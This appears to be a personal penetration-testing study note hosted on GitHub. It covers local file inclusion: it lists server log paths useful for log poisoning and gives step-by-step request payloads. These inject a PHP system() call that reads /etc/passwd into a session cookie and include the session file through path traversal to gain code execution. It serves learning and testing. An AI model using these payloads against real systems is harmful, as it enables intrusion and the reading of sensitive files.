-
Notifications
You must be signed in to change notification settings - Fork 0
/
LFI
32 lines (24 loc) · 1.18 KB
/
LFI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Things that I need to study more:
LFI by log
Interesting files to use:
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
_____________________________________________________________________________________________________________________________
LFI by php:
Via PHP sessions:
1 -> Check if the website use PHP Session (PHPSESSID)
In PHP these sessions are stored into /var/lib/php5/sess\[PHPSESSID]_ files
Ex: /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
2 -> Set the cookie to <?php system('cat /etc/passwd');?>
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
3 -> Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
So, don't only think about login form = try sqli. You could use login form to try rce by LFI via PHP sessions!!